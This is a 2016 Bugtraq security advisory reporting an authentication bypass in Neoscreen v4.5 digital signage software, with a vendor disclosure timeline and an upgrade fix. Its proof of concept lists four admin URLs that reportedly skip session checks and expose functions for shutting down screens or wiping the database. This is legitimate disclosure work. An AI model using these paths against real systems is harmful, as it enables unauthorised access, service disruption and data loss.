[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201607241129.u6OBTX82023515@sf01web2.securityfocus.com>
Date: Sun, 24 Jul 2016 11:29:33 GMT
From: alex_haynes@...look.com
To: bugtraq@...urityfocus.com
Subject: Neoscreen v4.5 Authentication bypass
Exploit Title: Neoscreen v4.5 Authentication bypass
Product: Neoscreen by Cube Digital Media
Vulnerable Versions: 4.5 and all previous versions
Tested Version: 4.5
Advisory Publication: July 24, 2016
Vulnerability Type: Authentication Bypass Issues [CWE-592]
CVE Reference: NONE
Credit: Alex Haynes
Advisory Details:
(1) Vendor & Product Description
--------------------------------
Vendor:
Cube Digital Media
Product & Version:
Neoscreen digital signage software v4.5
Vendor URL & Download:
http://www.cube-display.fr
Product Description:
"Neoscreen is an innovative, scalable and particularly powerful communication system. With just a few clicks, you can control all your dynamic display screens from your PC, wherever they may be in the world. "
(2) Vulnerability Details:
--------------------------
Several URL's of the admin interface of the neoscreen software do not perform session checks correctly, thereby allowing authentication bypass and allowing any user to access admin functions.
Proof of concept:
Any of the following URL's will allow access to the admin interface os the Neoscreen software, to admin functions that (among other things) allow the user to shutdown the screen completely, or wipe the database.
http://neoscreen/cubelocal/admin/shutdownMachine.asp
http://neoscreen/cubelocal/admin/stabilityControl.asp
http://neoscreen/cubelocal/modules/neoscreen/messages/basevide.asp
http://neoscreen/cubelocal/classe/index.asp
(3) Advisory Timeline:
----------------------
25/01/2016 - First Contact: vendor responds saying they are working on fix
24/02/2016 - Follow up e-mail to request fix timeline. No vendor response.
03/03/2016 - Follow up e-mail to request fix timeline.
04/03/2016 - Vendor responds saying fix will be available 14/03/2016.
(4)Solution:
------------
Upgrade to version 5 will fix this vulnerability.
(5) Credits:
------------
Discovered by Alex Haynes
Powered by blists - more mailing lists